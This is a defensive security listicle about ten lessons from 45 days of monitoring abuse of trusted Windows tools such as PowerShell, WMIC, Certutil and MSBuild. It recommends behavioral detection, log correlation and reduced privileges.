45 Days of Tool Monitoring: 10 Eye-Opening Truths About Your Real Attack Surface

Imagine watching your own trusted IT utilities—PowerShell, WMIC, Certutil, and others—for 45 straight days. What you’d see isn’t just routine administration; it’s a mirror into the very tactics attackers use. Inspired by Bitdefender’s analysis and the concept that “your biggest security risk isn’t malware—it’s what you already trust,” this listicle distills the hard-won lessons from that observation. Each truth reveals how everyday tools become attack vectors, and how understanding them can shrink your real attack surface.

1. PowerShell Is the Most Abused Tool—Period

PowerShell is the Swiss Army knife for both sysadmins and attackers. During the 45-day watch, it appeared in nearly every suspicious session. Why? It’s built into Windows, deeply trusted, and capable of executing commands, scripts, and even downloading payloads. Attackers use it to run obfuscated scripts in memory, leaving minimal disk artifacts. The reality: if you’re not closely monitoring PowerShell usage, you’re blind to a huge chunk of post-exploitation activity. Back to top

2. Legitimate Admin Traffic and Attacks Look Identical

One of the most jarring discoveries was how often real administration and malicious activity shared the same command lines. A sysadmin running a quick WMI query to check disk space and an attacker using WMI to move laterally—both look like “normal” operations. This means traditional signature-based detection fails. The only way to tell them apart is through behavioral context: timing, frequency, and the users or accounts involved. Without that context, you’ll either miss attacks or drown in false positives.

3. WMIC Is the Lateral Movement King

WMIC (Windows Management Instrumentation Command-line) is a favorite for attackers who want to hop from one machine to another. During the observation period, WMIC connections often preceded data exfiltration or ransomware deployment. Unlike more exotic tools, WMIC is pre-installed and rarely flagged. The lesson: any use of WMIC across network boundaries deserves scrutiny. Implement alerts for WMI queries to remote systems, especially from non-admin accounts or outside normal hours.

4. Certutil Does More Than Manage Certificates

Certutil is a legitimate tool for certificate services, but attackers have repurposed it as a downloader. In the 45-day window, multiple incidents showed Certutil being used to fetch executable files from remote servers. Because Certutil is signed by Microsoft, it often bypasses application whitelisting and even some AV. The takeaway: treat any outbound HTTP/HTTPS call from Certutil as suspect. Better yet, restrict its use to only certificate-related tasks via policy or AppLocker rules.

5. MSBuild Compiles Code Right Under Your Nose

MSBuild, the build engine for .NET, is another trusted tool turned weapon. Attackers use it to compile and execute C# code on the fly—often without writing anything to disk. This technique, called “living off the land,” allows them to run custom payloads while looking like a developer’s build process. Monitoring MSBuild invocation (especially with arguments pointing to suspicious XML files) is critical. In the 45-day study, it was the third most common abuse vector behind PowerShell and WMI.

6. Netsh Reveals Network Reconnaissance Patterns

Netsh is used for network configuration, but attackers leverage it for reconnaissance—enumerating firewall rules, routing tables, and open ports. During the monitoring, any netstat or netsh command that queried firewall policies or port status was a red flag. Combine this with short time intervals between commands and you have a classic recon pattern. The key is to baseline normal netstat use in your environment; any deviation should trigger investigation.

7. Logging Is Only Half the Battle

Many organizations have logging in place, but the 45-day experiment showed that logs alone don’t stop attacks. The real challenge is correlating events across hundreds of tools and thousands of machines. For example, a PowerShell script execution log paired with a Certutil download log from the same host at the same time is a strong indicator of compromise. Without proper correlation, you’re just storing data, not gaining insight. Invest in SIEM or UEBA to make your logs actionable.

8. False Positives Are the Silent Killer of Security Teams

During the observation, the team faced a flood of alerts—most were false positives from legitimate admin tasks. The result? Fatigue and missed real threats. The culprit was overly broad detection rules that flagged any use of built-in tools. The solution is to tune detections based on your organization’s specific baseline. For instance, if IT regularly runs WMI queries on Fridays, don’t alert on that—instead, alert on WMI from non-IT workstations or at unusual hours.

9. Behavioral Analytics Beat Signature Matching

By day 30, it became clear that static signatures were useless. Attackers modify payloads with trivial obfuscation, but their behavior—like running multiple command-line tools sequentially from a single process—stays consistent. Behavioral analytics, such as monitoring for parent-child process relationships (e.g., Word launching PowerShell), caught far more real incidents. This approach also helps distinguish between a sysadmin running a script and an attacker doing the same thing, because the sequence and context differ.

10. Reducing Privilege Is Your Most Effective Control

The final truth is simple but profound: the less trust you grant to these tools, the smaller your attack surface. During the 45 days, every incident traced back to over-privileged accounts or unrestricted tool access. Remove admin rights from standard users, restrict PowerShell to constrained language mode, and block Certutil outbound connections. Even partial implementation of these controls forced attackers to use noisier, riskier methods—making them easier to detect. Tool monitoring confirms that locking down trust is the foundation of defense.

Conclusion: The Mirror Doesn’t Lie

Watching your own tools for 45 days is like holding up a mirror to your organization’s security posture. It reveals that the very utilities you trust are the ones attackers exploit most. But it also gives you a roadmap: monitor behavior, baseline normal activity, reduce privileges, and correlate logs intelligently. The attack surface isn’t just your network perimeter—it’s every trusted tool running inside it. By understanding these ten truths, you can turn your tools from an attacker’s ally into your strongest defense.